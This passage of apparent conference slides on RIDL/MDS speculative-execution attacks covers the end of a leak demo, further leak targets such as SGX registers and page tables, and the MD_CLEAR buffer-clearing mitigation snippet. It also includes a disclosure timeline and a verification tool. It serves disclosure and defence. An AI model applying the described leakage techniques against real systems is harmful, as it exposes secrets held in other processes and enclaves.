[ LOG ] - 0.9115794796348814B/s
pit@cutiesky:~/ridl-js$ exit
```

## **MORE EXAMPLES**

Also mentioned in our paper:

- Leaking from ports
- Reading SGX registers (again..)
- Leaking internal CPU data (e.g. page tables)

# **MITIGATIONS**

## **EXISTING MITIGATIONS**

Before May, three mechanisms:

- Inhibit Trigger (stop speculation, fences, retpoline)
- Hide Secret (KPTI, array index masking, L1D flush)
- Disrupt channel of leakage (disable timers)

Introduced in May:

- Same-thread:
  - verw overwrites affected buffers
  - Special Assembly snippets

# MD\_CLEAR WORKAROUND

```
__asm__ __volatile__ (
        "lfence\n\t"
        "orpd (%1), %%xmm0\n\t"
        "orpd (%1), %%xmm0\n\t"
        "xorl %%eax, %%eax\n\t"
        "1:clflushopt 5376(%0,%%rax,8)\n\t"
        "addl $8, %%eax\n\t"
        "cmpl $8*12, %%eax\n\t"
        "jb 1b\n\t"
        "sfence\n\t"
        "movl $6144, %%ecx\n\t"
        "xorl %%eax, %%eax\n\t"
        "rep stosb\n\t"
        "mfence\n\t"
       : "+D" (dst)
       : "r" (zero_ptr)
       : "eax", "ecx", "cc", "memory"
);
```

Introduced in May:

- Same-thread:
  - verw overwrites affected buffers
  - Special Assembly snippets
- Cross-thread:
  - Complex scheduling and synchronization
  - <u>Disable Intel Hyper-Threading</u>®

# **SPOT MITIGATIONS**

# **FUTURE OF MITIGATIONS**

Looking at our diagram, there might be other issues...



# TAKE HOME MESSAGE

These issues **need to be fixed!** 

# HardFails: Insights into Software-Exploitable Hardware Bugs

Ghada Dessouky, David Gens, Arun Kanuparthi, Hareesh Khattri, Jason M. Fung, Ahmad-Reza Sadeghi and Jeyavijayan Rajendran

Technische Universität Darmstadt;

**Texas A&M University**;

**Intel Corporation** 

Disclosure process (timeline: Sep through May)















# https://mdsattacks.com



# **MDS TOOL**

Stephan wrote a tool to verify your system:



# **CONCLUSION**

- Spectre and Meltdown, just one mistake?
- New **class** of speculative execution attacks
- Many more buffers other than caches to leak from
- How many bugs are left?

- https://mdsattacks.com